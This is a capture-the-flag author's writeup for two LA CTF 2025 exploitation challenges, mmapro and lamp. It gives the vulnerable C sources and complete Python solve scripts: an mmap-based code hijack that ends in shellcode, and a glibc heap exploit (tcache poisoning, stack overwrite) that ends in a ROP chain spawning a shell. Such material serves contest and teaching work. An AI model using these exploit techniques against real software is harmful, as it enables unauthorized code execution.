LA CTF 2025 - Author Writeups

2025-02-09 2414 words 12 minutes

Contents

Writeups of pwn/mmapro and pwn/lamp from LA CTF 2025.

overview

This year I wrote six challenges for LA CTF: lamp, mmapro, eepy, messenger, and library in the pwn category, and elfisyou in the rev category. My solutions can be found in the challenge archive, but I also decided to provide writeups for two of the challenges that I found particularly interesting.

mmapro

This challenge requires you to spawn a shell using a single mmap syscall. The program exits immediately after the call, not providing control over the contents of the mapped memory. The technique for solving this seems fairly novel, so I’m going to coin it “mmap oriented programming” or MOP for short, although it’s unlikely to be useful outside of contrived challenges like this one.

source

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


#include <unistd.h>
#include <sys/mman.h>

int main()
{
	long a[6] = {mmap};
	write(1, a, 8);
	read(0, a, sizeof(a));
	mmap(a[0], a[1], a[2], a[3], a[4], a[5]);
}

overview

The program is dynamically linked with glibc 2.37. We are given a libc address leak and must supply six 64-bit arguments to mmap. The program will exit immediately after, which involves calling various libc destructor functions.

In order to modify the subsequent execution of the program in any way, we must clobber a libc code mapping. With the MAP_FIXED flag, mmap will interpret its first argument as an absolute address and replace any existing mappings that overlap the new range. This mapped memory will be completely zeroed, effectively letting us punch a single, contiguous hole of null bytes into libc’s code region. The position and length of this hole is limited to page granularity.

This is an x86-64 binary, so the null byte pages will decode to the repeated instruction add byte ptr [rax], al, which is encoded as two null bytes. This is effectively a nop when rax points to writeable memory. If we start a mapping at some page in libc that is executed when rax is writeable, we can cause the program to nop slide through N pages, N being dependent on our length parameter, and it will continue executing at the start of some later code page.

This “landing” page can be thought of like a gadget, as it contains some unique instructions that may allow us to continue code execution depending on how it uses memory or registers that we control. The page granularity will slice most instructions in half, but thanks to x86 encoding, these may still be useful to us.

solution

There are 376 pages of code on this libc. We have to first find some valid starting pages, and for each we will have at most 375 different slide lengths into different gadgets. I wrote some scripts to extract these gadgets and began inspecting them manually, but this isn’t super feasible since they often depend on various conditionals and jumps. It would make sense to write a symbolic execution tool for this.

There are multiple starting pages that work with a writeable rax, but the most useful one is the page containing the code for the libc mmap function itself, since we will have control over six registers at that point. rax will be the syscall return value, which is the address of the page we mapped, and we can ensure it’s writeable because we control the protection parameter. I wrote a gdb script to test each slide length given this starting page offset of 0x115000 and wrote the contents of the registers on segfault to a file. I found that at length 0x57000 we could control rip. This was due to our parameters being saved on the stack, and the gadget eventually causing a return to those values after calling ioctl.

There are unfortunately a few restrictions to the parameters we must comply with to ensure the mmap succeeds. By bruteforcing, I found that the bits set in the flags parameter have to match the mask 0xffffffffffebfff2, and the mapping must be at least writeable and executable, so the prot parameter needs to have its 2 and 4 bits set. Additionally, the last parameter, offset, must be page aligned.

The gadget at offset 0x57000 returns to our parameters on the stack starting with flags, followed by fd and offset. fd is completely controllable, so I set it to the address of gets, and I set flags to a single ret gadget that complies with the mask (slightly dependent on ASLR). rdi will be set to the address we mapped, meaning the gets call will write code to our region. After the gets call, we will return to our offset parameter, which we can make the initial page that the gets wrote to, and this satisfies the alignment check. We can then send shellcode to gets.

The solution thus boils down to:

mmap(libc.address+0x115000, 0x57000, 7, libc.address+0xbda72, libc.sym.gets, libc.address+0x115000)

I will note that it took me testing slides on multiple different libcs before I found one that had a working gadget. My full solve script is provided below.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45


#!/usr/bin/env python3

from pwn import *

exe = ELF("./mmapro_patched")
libc = ELF("./libc.so.6")

serv = "chall.lac.tf"
port = 31179

context.binary = exe

def conn():
    if args.REMOTE:
        r = remote(serv, port)
    else:
        r = process([exe.path])
    return r

r = conn()

def mmap(a, b, c, d, e, f):
    r.send(p64(a)+p64(b)+p64(c)+p64(d)+p64(e)+p64(f))

def main():
    global r
    for i in range(0x10):
        log.info(f"{i}")
        libc.address = u64(r.recv(8))-0x115f20
        log.info(f"{hex(libc.address)=}")
        mask = 0xffffffffffebfff2
        flags = libc.address+0xbda72
        if (flags & ~mask) != 0:
            print("unlucky with mask")
            r.close()
            r = conn()
            continue
        mmap(libc.address+0x115000, 0x57000, 7, libc.address+0xbda72, libc.sym.gets, libc.address+0x115000)
        sleep(0.2)
        r.sendline(asm(shellcraft.sh()))
        r.interactive()
        exit()

if __name__ == "__main__":
    main()

lamp

This is an arbitrary heap overflow challenge on glibc 2.39 with no file streams in use and an infinite program loop. We are initially given a heap leak, and allocations are restricted to a max size of 0xff. Input is also taken through a custom gets function that doesn’t null terminate, allowing partial overwrites. There is an amazing writeup up of this challenge by Jonathan Keller. It provides a much more detailed description of the solve path compared to my brief overview here, so I highly recommend checking it out. The source for the challenge is provided below.

source

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27


#include <stdlib.h>
#include <unistd.h>

void gets(char *p) {
	char c;
	for(;;) {
		c = *p;
		read(0, p, 1);
		if(*p == '\n') {
			*p = c;
			break;
		}
		p++;
	}
}

int main() {
	char *leek = malloc(0x18);
	free(leek);
	write(1, leek, 8);
	char buf[3] = {};
	for(;;) {
		write(1, ">", 1);
		read(0, buf, 2);
		gets(malloc(strtol(buf, 0, 0x10)));
	}
}

solution

We first set up a repeatable sysmalloc free primitive to obtain free chunks of sizes up to 0xf0.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


def free(sz):
    sz += 0x20
    if sz > 0x100:
        log.error("unsupported free size")
        exit(1)
    rem = (0x100-sz)//0x10
    for i in range(13):
        if rem > 0:
            add(0xff)
            rem -= 1
        else:
            add(0xf8)
    add(0xf8, b"A"*0xf8 + p64(sz|1))
    add(0xf8)

We can build an arbitrary write primitive by overflowing into freed tcache chunks, a technique described here. There are no file streams and our program never exits, so we’ll need to target the stack to hijack control flow. The run binary accompanied with the challenge execves lamp with a particular argv and envp, which hints at the next step.

We fill up the tcache to get smallbin chunks and partial overwrite the libc arena list pointer to link in a chunk around __libc_argv. The run binary ensures that there are enough environment variables, which result in pointers being placed at offsets that make it a valid unlinkable chunk. This part requires a 4 bit bruteforce for the libc partial overwrite, and it’s the only bruteforce we’ll need.

When we allocate from the smallbin after forging the entry, it will perform tcache stashing. We set enough prior smallbin entries such that the __libc_argv chunk is the last chunk linkable into the tcache due to the max of 7 entries, which both prevents corruption and places it as a raw pointer in the heap through the tcache_perthread_struct (TPS).

We use our arbitrary write to overwrite the low 2 bytes of the stack pointer to zero. This will be a valid address that’s guaranteed to be below our current position on the stack. Given our infinite overflow, we can keep sending bytes up the stack until we reach the return address of read, partial overwriting it with the byte 0xa0 to loop main through _start. This is implemented by adding a recv timeout after each byte sent to detect the looping. By keeping track of the number of bytes we have to send before the loop is triggered, we can calculate the low bytes of the stack for future overwrites.

We want a stack leak when main loops in order to set up ROP for later, so before beginning this process, we duplicate a mangled __libc_argv pointer into the 0x20 TPS entry. This is achieved by corrupting the fd to a chunk with the stack pointer as the first qword, which it will mangle when placing into the TPS when the previous chunk is allocated. When we loop main, it will allocate a 0x20 chunk and free it, mangling the current already mangled stack TPS entry and placing it in the first qword, which is leaked to us. Because the mangling happens twice, we end up with a normal stack pointer for our leak, although it being mangled wouldn’t be an issue anyway, since we would have the heap leak to demangle it.

Now we have a full stack leak by combining our calculated byte count with the address leak. We repeat this general process for a libc leak, and finally allocate a chunk on the stack to hold our ROP chain. We then send part of our ROP chain through the strtoul buffer and partial overwrite to a ret gadget with 0xf8. This initiates our ROP chain and spawns a shell.

I think the idea of starting with a low stack address to both avoid bruteforce and calculate a leak was pretty cool. My full solve script with comments is provided below.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187


#!/usr/bin/env python3

from pwn import *
from tqdm import tqdm

exe = ELF("./lamp")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

serv = "chall.lac.tf"
port = 31169

context.binary = exe
context.aslr = False

def conn():
    if args.REMOTE:
        r = remote(serv, port)
    else:
        r = process(["./run"])
        if args.GDB:
            gdb.attach(r, gdbscript="""
                base
                #b *0x7ffff7cabe87
            """)
    return r

r = None
    
def mangle(ptr, pos):
    return (pos >> 12) ^ ptr

def flush():
    global cnt
    r.recvuntil(b">"*cnt)
    cnt = 0

def add(sz, data=b"A"):
    global cnt
    r.send(str(hex(sz)[2:]).encode())
    r.sendline(data)
    cnt += 1

def free(sz):
    sz += 0x20
    if sz > 0x100:
        log.error("unsupported free size")
        exit(1)
    rem = (0x100-sz)//0x10
    for i in range(13):
        if rem > 0:
            add(0xff)
            rem -= 1
        else:
            add(0xf8)
    add(0xf8, b"A"*0xf8 + p64(sz|1))
    add(0xf8)

def shoot():
    global r, cnt, heap
    cnt = 1
    heap = u64(r.recv(8))<<12
    log.info(f"{hex(heap)=}")
    # set up predictable top chunk for free primtive
    for _ in range(11):
        add(0xff)
    add(0xff, b"A"*0x108 + p64(0x91))
    add(0xf8)
    # partial overwrite smallbin arena pointers to forge
    # entry with stack address, will be put
    # into tcache after tcache stashing
    sz = 0xa0
    for _ in range(11):
        free(sz)
    free(0x20)
    free(sz)
    for _ in range(7):
        free(sz+0x10)
    free(0x20)
    free(sz+0x10)
    free(sz+0x10)
    #off = 0xf6e0
    off = 0x46e0
    add(0x18, b"A"*0x21f68+p64(sz+0x10|1)+p64(heap+0x1b9f40)+p16(off-0x18))
    add(0x18, b"A"*0x21f78+p64(sz|1)+p64(heap+0x175f40)+p64(heap+0x2ebf30))
    for _ in range(7):
        add(sz-8)
    add(sz-8)
    # partial overwrite stack address in TPS with zeros
    # so it's definitely below return address of read
    sz += 0x20
    free(sz)
    free(0x20)
    free(sz)
    add(0x18, b"A"*0x21f58+p64(sz|1)+p64(mangle(heap+0xc0, heap+0x373f20)))
    add(sz-8)
    partial = 0
    add(sz-8, p64(0)*2+p16(partial))
    # set up 0x20 to have stack fd for leaking later
    add(0x18)
    free(0x20)
    free(0x30)
    free(0x20)
    add(0x28, b"A"*0x22008+p64(0x21)+p64(mangle(heap+0xd0, heap+0x3d9fc0)))
    add(0x18)
    add(0x18, b"\x00")
    for _ in range(8):
        free(0x90)
    # gradually send bytes into stack,
    # will loop main once we overwrite low byte of
    # read's return, keep track of number of bytes sent for leak
    flush()
    leak = b""
    r.send(b"98")
    r.send(p8(0xa0)*8)
    diff = 8 + partial
    for _ in tqdm(range(0x10000//16)):
        r.send(p8(0xa0))
        leak = r.recvuntil(b">", timeout=0.05)
        if leak != b"":
            break
        r.send(p8(0xa0)*15)
        diff += 0x10
    stack = (u64(leak[:8])&(~0xffff))+diff-0x150
    log.info(f"{hex(stack)=}")
    # leak libc with tcache poisoning on stack to loop main
    free(0x40)
    free(0x20)
    add(0x38, p64(0x431)*(0x22018//8)+p64(0x21)+p64(mangle(heap+0x52bfc0, heap+0x52dfc0)))
    add(0x18)
    free(0x30)
    free(0x40)
    free(0x30)
    add(0x38, b"A"*0x22008+p64(0x31)+p64(mangle(stack-0x18, heap+0x593fb0)))
    add(0x28)
    flush()
    add(0x28, p64(0)*3+p8(0xa0))
    stack -= 0x150
    libc.address = u64(r.recv(8))-0x203b20
    log.info(f"{hex(libc.address)=}")
    # set up rop chain, requires sending
    # payload into the strtol input buffer.
    # will return 0 when conversion is bad so we poison 0x20
    add(0xff)
    add(0xff)
    add(0xff)
    add(0xff)
    add(0xf8)
    free(0x30)
    free(0x40)
    free(0x30)
    add(0x38, b"A"*0x22008 + p64(0x31) + p64(mangle(stack+8, heap+0x5f9fb0)))
    add(0x28)
    poprdi = libc.address+0x10f75b
    poprsi = libc.address+0x2b46b
    poprax = libc.address+0xdd237
    xorrdx = libc.address+0xa0d6f
    rop = p64(poprdi)+p64(next(libc.search(b"/bin/sh\x00")))
    rop += p64(poprsi)+p64(0)*2+p64(poprax)+p64(0x3b)+p64(xorrdx)
    add(0x28, rop)
    free(0x20)
    free(0x30)
    free(0x20)
    add(0x28, b"A"*0x22008+p64(0x21)+p64(mangle(stack-0x18, heap+0x65ffc0)))
    add(0x18)
    r.send(p16((poprdi>>40)&0xffff))
    r.sendline(p64(0)*3+p8(0xf8))
    r.interactive()

def main():
    global r
    done = False
    # 4 bit bruteforce
    for i in range(0x20):
        r = conn()
        log.info(f"attempt {i}")
        try:
            shoot()
            done = True
        except:
            r.close()
            pass
        if done:
            break

if __name__ == "__main__":
    main()